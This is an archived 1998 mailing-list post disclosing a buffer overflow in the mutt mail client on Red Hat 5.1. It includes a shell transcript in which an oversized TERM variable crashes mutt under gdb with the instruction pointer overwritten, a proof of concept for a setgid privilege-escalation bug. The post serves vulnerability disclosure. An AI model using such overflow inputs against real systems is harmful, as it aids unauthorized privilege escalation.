mailing list archives
mutt buffer overflow?
From: jn1 () ATOMNET PL (funkySh)
Date: Thu, 22 Oct 1998 09:24:51 +0200
Sorry if this is already known..
There have been some posts about the buffer overflow in mutt,
(by sending an specially formated Content-Type) here is another
one (i think exploitable) in mutt 0.91.1-2 shipped with
RH 5.1 with setgid mail
[orbital () PulpFiction /]$ TERM=`perl -e 'print "A" x 240'`
[orbital () PulpFiction /]$ mutt
[orbital () PulpFiction /]$ gdb /usr/bin/mutt
Starting program: /usr/bin/mutt
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
Mutt 0.91.1-5 has still the same problem but setgid mail is turned off..
funkySh jn1 () atomnet pl
PGP keyID: 768/D837F9A1
fingerprint 36 78 A6 D7 55 38 12 51 05 93 36 65 A0 6E 6D 22